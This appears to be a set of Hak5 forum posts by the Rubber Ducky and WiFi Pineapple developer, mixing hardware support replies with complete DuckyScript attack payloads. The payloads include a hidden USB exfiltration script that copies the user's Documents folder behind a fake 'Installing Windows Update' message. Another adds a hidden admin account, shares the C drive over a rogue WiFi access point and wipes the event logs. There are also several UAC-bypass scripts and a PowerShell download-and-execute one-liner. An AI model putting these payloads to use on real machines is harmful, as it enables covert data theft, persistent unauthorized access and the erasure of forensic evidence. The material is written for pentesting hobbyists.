Darren Kitchen

+1 Mad Props

I <3 TLAs. Also, what midnitesnake said. For hashdumping it's totally feasible, but when it comes to "backing up" a lot of data, an off-the-shelf USB drive is the way to go. Sure, we could re-engineer the duck to do USB3 speeds, but it would cost a metric buttload. Better off just using a 2nd thumbdrive.

Tried to look up your order and see if we could send you a new board but I'm not finding anything from your d***gmail address. Hit us up. Nevermind, found your Ice W*** address. Board on it's way to Manchester now. It should be blank so you can either serial flash it or if you need to recover stuff off your existing board and are so adventurous, try to swap out the power regulator that's likely blown.

I wanted to follow up with Overwraith's Ducky Slurp payload with one slightly more discrete and accurate. Tested successfully on Win7 If you haven't seen the Duckly Slurp payload yet check it out here https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/?hl=slurp Basically this payload drops an invisible looping batch file on the target PC which waits for a USB drive labeled "DUCKY" to be inserted. Once the USB drive labeled "DUCKY" is inserted the file %duckyDRIVE%\DuckSlurp\DuckSlurp.bat is executed invisibly which copies all of the data from %userprofile%\documents Customize to your hearts content. Injection time in just a few seconds. REM Author: overwraith modified by dkitchen REM Name: DuckSlurp.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Uses googleknowsbests slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 REM *** Change directories because System32 appears to be protected. *** STRING CD %TEMP% ENTER REM *** Delete wait batch file if already exists *** STRING erase /Q DuckyWait.bat ENTER REM *** Make batch file that waits for SD card to mount. *** STRING copy con DuckyWait.bat ENTER STRING :while1 ENTER STRING @echo off ENTER STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if [%DUCKYdrive%] EQU [] ( ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING ) else ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ ENTER STRING wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly *** STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM *** Exit *** STRING EXIT ENTER Now make sure to label your USB drive "DUCKY" and create a folder on the root named "DuckSlurp" Within that folder create a batch file named "DuckSlurp.bat" containing the following: @echo off @echo Installing Windows Update set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents %destination% >>nul ) @cls @exit The payload actually runs this batch file using the invis.vbs wscript so it shouldn't be seen on screen, however if it were to be it would simply state "Installing Windows Update" briefly.

Well that's a use case we had not envisioned. The easiest solution is a normal usb drive, otherwise it's a bit of a hack. Perhaps a manual default gateway setting under network configuration would be useful.

Emphasis mine.

What technique are you using to drop the shell?

I do recall when developing duckyscript running into these key combos, but I can't recall the hex values. They weren't incorporated however that isn't to say they couldn't be added. If you open an inject.bin in a hex editor it'll start to make sense - modifier followed by key. 00 is no modifier. I believe the scancode for sleep is E0 5F or E0 3F. http://www.quadibloc.com/comp/scan.htm

I wrote this to quickly and easily exfiltrate data from a target Windows 7 machine. It's successful in sharing data without setting off alarms by touching the network or mounting mass storage. This payload adds a hidden admin user with NTFS privs for the C drive, enables file and printer sharing, shares the C drive and create a WiFi SoftAP on the target Windows 7 machine. Logs are cleaned on exit. It may be better suited for exfiltration as you only require physical access to the machine for 15-20 seconds, thereafter you only require wifi proximity to download (or upload) files. Of course your target requires a wireless Interface. I'm using a new UAC bypass and terminal obfuscation technique which could be applied to your payloads. Payload REM Payload: Exfiltration via WiFi SoftAP REM Target: Windows 7 REM Author: Darren Kitchen REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 REM *** Make console light yellow on bright white and very tiny *** STRING color FE ENTER STRING mode con:cols=14 lines=1 ENTER REM *** Add User techsupport *** STRING copy con techsupport.cmd ENTER STRING net User techsupport techsupport /ADD ENTER REM *** Add User techsupport to Admin Group *** STRING net LocalGroup Administrators techsupport /ADD ENTER REM *** Hide User techsupport *** STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v techsupport /t REG_DWORD /d 0 /f ENTER REM *** Enable File and Printer Sharing *** STRING netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes ENTER REM *** Share C Drive and grant techsupport NTFS privs *** STRING net share techsupport=c:\ /UNLIMITED ENTER STRING icacls c:\users\* /grant techsupport:(OI)(CI)F ENTER REM *** Bring up any WiFi Interfaces on the PC *** STRING netsh interface set interface name="Wireless Network Connection" admin=enabled ENTER STRING netsh interface set interface name="Wireless Network Connection 2" admin=enabled ENTER STRING netsh interface set interface name="Wireless Network Connection 3" admin=enabled ENTER REM *** Start software Wireless Access Point *** STRING netsh wlan set hostednetwork ssid=techsupport key=techsupport ENTER STRING netsh wlan start hostednetwork ENTER REM *** Clear log files and exit *** STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER STRING exit ENTER CTRL z ENTER REM *** Run Payload and Minimize *** STRING techsupport.cmd ENTER ALT SPACE DELAY 100 STRING n Usage After deploying payload on target Windows 7 PC connect to the SoftAP from another machine (SSID techsupport Password techsupport) and browse to the C drive share (techsupport) with username techsupport and password techsupport. Post-Exploitation Cleanup From the C drive share over WiFi upload the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd del c:\windows\system32\techsupport.cmd net user techsupport /delete net share techsupport /delete for /f %x in ('wevtutil el') do wevtutil cl "%x" del "%~f0" Persistence Alternatively if you would like the techsupport user, share and network to be available all of the time consider adding the following script to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\cleanup.cmd netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes netsh interface set interface name="Wireless Network Connection" admin=enabled netsh interface set interface name="Wireless Network Connection 2" admin=enabled netsh interface set interface name="Wireless Network Connection 3" admin=enabled netsh wlan set hostednetwork ssid=techsupport key=techsupport netsh wlan start hostednetwork

BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. Which is why.... powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe" However cool, it still doesn't open a command prompt bypassing UAC.

The duck is pretty good at bypassing UAC. Let's make it better. REM ********************************* REM Payload: Old Method to Bypass UAC REM Target: Window 7 REM Author: Darren Kitchen REM ********************************* GUI DELAY 500 STRING cmd DELAY 3000 MENU DELAY 2000 STRING a REM ************************************************************* REM Depending on Windows Version an ENTER could be necessary here REM ************************************************************* DELAY 3000 LEFT ENTER DELAY 500 STRING echo Admin Prompt in 9 seconds Not bad. Let's shave another 2 seconds off... REM ******************************** REM Payload: Less Finicky UAC Bypass REM Target: Window 7 REM Author: Darren Kitchen REM ******************************** GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING copy con sudo.cmd ENTER STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs ENTER STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs ENTER STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs ENTER STRING @cscript %temp%\sudo.tmp.vbs ENTER CTRL z ENTER STRING sudo.cmd cmd ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 7 seconds Not bad. Let's shave another 2 seconds off... REM ******************************************** REM Payload: Fastest UAC Bypass using Powershell REM Target: Window 7 REM Author: Darren Kitchen REM ******************************************** GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds Not bad. Let's shave another 2 seconds off...? Thoughts?

I'd figure the scenario in which USB3 is required is exfiltration of large amount of data in a short amount of time. If this is the case the agent may be better suited armed with both a ducky and a fast USB 3.0 drive of ample capacity.

Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/ I'm not sure if it uses the same technique but it's another great resource.

One of the trade-offs in usability and cost as the hardware platform has evolved was going from the expensive metal swing door (which sometimes popped open!) to a much more cost efficient microSD slot. The board is also as thin as it is so the whole package will fit inside the inconspicuous looking case. While the spring-loaded card slot would have been more convenient it would not have fit. If you can't get it with your fingernails try a pair of pliers or tweezers and the card slot will loosen up after just a few uses.

Is there a requirement for USB3 transfer speed that would warrant the extreme cost?

3.0.0 or 2.8.1? I'm not seeing a config file for your particular modem in /etc/usb_modeswitch.d on the former. What model Huawei? You shouldn't have a wan2 network on 2.x until after dialing and on 3.x it's blank until you fill in the details from network > mobile broadband.

T-Mobile, the carrier in the US who does not require ID and happily accepts cash, will soon introduce a new LTE modem. Until then they only offer phones and "personal hotspots". Of course most unlocked HSDPA modems should take their SIM cards and work with the pineapple no problem, granted you have the proper dialing information. Since v3 the MK4 supports about 300 modems. I've had success with unlocked HSDPA modems from Huawei and ZTE. Just keep in mind the faster LTE modems requite a log of juice (usually above and beyond spec) so you'll probably need either a powered hub or a powered USB Y-cable. Personally I'm a fan of the cheap Android "burner" phone since it works out of the box without any configuration on the pineapple and has its own battery - but as you've pointed out there are plenty of options.

Join Team Jasager for this Firmware version 3.0 launch hangout! Today @ 3:30 PT https://plus.google.com/u/0/events/ctuepcgghf18rgm9eid860b7e0g Will update with recorded clip after the event. Join irc.hak5.org #hak5 for Q&A.

Wow this is fantastic! 411 - emailed you.

Can you provide additional information on the device? I've tested with Android 4.1.2 and 4.2.2 and all seeks to be fine. Karma Log 43449 a0:0b:ba:xx:xx:xx 172.16.42.248 * 01:a0:0b:ba:xx:xx:xx 43407 2c:9e:fc:xx:xx:xx 172.16.42.172 * 01:2c:9e:fc:xx:xx:xx 43357 38:aa:3c:xx:xx:xx 172.16.42.115 android-xxx 01:38:aa:3c:xx:xx:xx IP address HW type Flags HW address Mask Device 172.16.42.248 0x1 0x2 a0:0b:ba:xx:xx:xx * br-lan 172.16.42.115 0x1 0x2 38:aa:3c:xx:xx:xx * br-lan 172.16.42.42 0x1 0x2 54:53:ed:xx:xx:xx * br-lan 172.16.42.172 0x1 0x2 2c:9e:fc:xx:xx:xx * br-lan KARMA: Probe Request from 00:23:32:xx:xx:xx for SSID 'Baltic Joint Netswerk' KARMA: Successful association of a0:0b:ba:xx:xx:xx KARMA: Checking SSID for start of association, pass through poke KARMA: Probe Request from a0:0b:ba:xx:xx:xx for SSID 'poke' KARMA: Probe Request from a0:0b:ba:xx:xx:xx for SSID 'sayumi-N' KARMA: Successful association of 2c:9e:fc:xx:xx:xx KARMA: Checking SSID for start of association, pass through BJNPSETUP KARMA: Successful association of 38:aa:3c:xx:xx:xx KARMA: Checking SSID for start of association, pass through igotpwned KARMA: Probe Request from 38:aa:3c:xx:xx:xx for SSID 'igotpwned' KARMA: Probe Request from 38:aa:3c:xx:xx:xx for SSID 'Looxcie_01073A' KARMA: Probe Request from c4:85:08:xx:xx:xx for SSID 'sayumi-N' KARMA: Probe Request from 2c:9e:fc:xx:xx:xx for SSID 'BJNPSETUP' KARMA: ENABLED 00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPREQUEST(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx 00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPOFFER(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx 00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPDISCOVER(br-lan) 38:aa:3c:xx:xx:xx 00:02:37 Pineapple daemon.info dnsmasq-dhcp[1443]: DHCPACK(br-lan) 172.16.42.115 38:aa:3c:xx:xx:xx android-xxx 00:02:33 Pineapple daemon.info hostapd: wlan0: STA 38:aa:3c:xx:xx:xx IEEE 802.11: authenticated 00:02:33 Pineapple daemon.info hostapd: wlan0: STA 38:aa:3c:xx:xx:xx IEEE 802.11: associated (aid 1)

What you want to see is something like this: Jan 1 00:02:21 Pineapple daemon.notice pppd[2362]: pppd 2.4.5 started by root, uid 0 Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (BUSY) Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO CARRIER) Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (ERROR) Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO DIAL TONE) Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (NO ANSWER) Jan 1 00:02:22 Pineapple local2.info chat[2366]: abort on (DELAYED) Jan 1 00:02:22 Pineapple local2.info chat[2366]: report (CONNECT) Jan 1 00:02:22 Pineapple local2.info chat[2366]: timeout set to 10 seconds Jan 1 00:02:22 Pineapple local2.info chat[2366]: send (AT^M) Jan 1 00:02:22 Pineapple local2.info chat[2366]: expect (OK) Jan 1 00:02:22 Pineapple local2.info chat[2366]: AT^M^M Jan 1 00:02:22 Pineapple local2.info chat[2366]: OK Jan 1 00:02:22 Pineapple local2.info chat[2366]: -- got it Jan 1 00:02:22 Pineapple local2.info chat[2366]: send (ATZ^M) Jan 1 00:02:23 Pineapple local2.info chat[2366]: timeout set to 30 seconds Jan 1 00:02:23 Pineapple local2.info chat[2366]: expect (OK) Jan 1 00:02:23 Pineapple local2.info chat[2366]: ^M Jan 1 00:02:23 Pineapple local2.info chat[2366]: ATZ^M^M Jan 1 00:02:23 Pineapple local2.info chat[2366]: OK Jan 1 00:02:23 Pineapple local2.info chat[2366]: -- got it Jan 1 00:02:23 Pineapple local2.info chat[2366]: send (ATDT#777^M) Jan 1 00:02:23 Pineapple local2.info chat[2366]: expect (CONNECT) Jan 1 00:02:23 Pineapple local2.info chat[2366]: ^M Jan 1 00:02:26 Pineapple local2.info chat[2366]: ATDT#777^M^M Jan 1 00:02:26 Pineapple local2.info chat[2366]: CONNECT Jan 1 00:02:26 Pineapple local2.info chat[2366]: -- got it Jan 1 00:02:26 Pineapple local2.info chat[2366]: send (^M) Jan 1 00:02:26 Pineapple daemon.info pppd[2362]: Serial connection established. Jan 1 00:02:26 Pineapple daemon.info pppd[2362]: Using interface 3g-wan2 Jan 1 00:02:26 Pineapple daemon.notice pppd[2362]: Connect: 3g-wan2 <--> /dev/ttyUSB0 Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: reading /tmp/resolv.conf.auto Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: using nameserver 8.8.8.8#53 Jan 1 00:02:26 Pineapple daemon.info dnsmasq[1391]: using local addresses only for domain lan Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: local IP address 99.204.xxx.xxx Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: remote IP address 66.1.xxx.xxx Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: primary DNS address 66.xxx.xxx.xxx Jan 1 00:02:27 Pineapple daemon.notice pppd[2362]: secondary DNS address 68.xxx.xxx.xxx Jan 1 00:02:27 Pineapple daemon.notice netifd: Interface 'wan2' is now up Jan 1 00:02:28 Pineapple user.notice ifup: Enabling Router Solicitations on wan2 (3g-wan2) Jan 1 00:02:29 Pineapple user.notice root: ifup 3g-wan2 It looks like your modem has successfully modeswitched. What are the outputs of lsusb, ls /dev/tty* and cat /etc/ppp/options

Can you ping it? What are the results of ifconfig -a and netstat -r ?

1. Atheros is the only wifi vendor with open source drivers. As such the modified Karma Hostapd drivers are written for this hardware. Ath5k or ath9k should work. Previously the pineapple was on the AR2315 chipset for example. 2. I've gotten it working, albeit stripped down, on TP-Link hardware. It worked but the low memory and weak antenna was limiting. Also it's not FCC certified so if you're using it in the United States it isn't exactly legal. The AP121U is. I don't know of any other hardware in its class. 3. The most popular bootloader for this type of device is uboot. Another is redboot. Both support flashing over Ethernet, though the former is typically not configured as such. Any cheap UART / TTL will work - just keep voltages in mind. The ALFA dev board is nice, but not necessary for most. Whatever wifi hardware you go with keep in mind inherent limitations of the chipset as far as transmit power is concerned. You're really going to want a high gain antenna attached. 9dbi is a good place to start. Google the relationship between dbm power, dBi gain and EIRP and it should all make sense. Good luck! When I first started playing with pineapples I knew only basic Linux and embedded hardware. It's really a fulfilling project to take on. Cheers, Darren

Good call thesugarat. I just picked up that unit and it works quite well. Unfortunately it is expensive and I've been unable to source a supplier - as of yet. I'll keep on it. While the versatile power regulator on the mk4 has been convenient, accepting anywhere between 5v and 14v, it has become apparent how under very heavy load a higher voltage is required. While for basic usage the 5v adapter will suffice I am continuing to looking for a suitable 5/9/12v battery pack.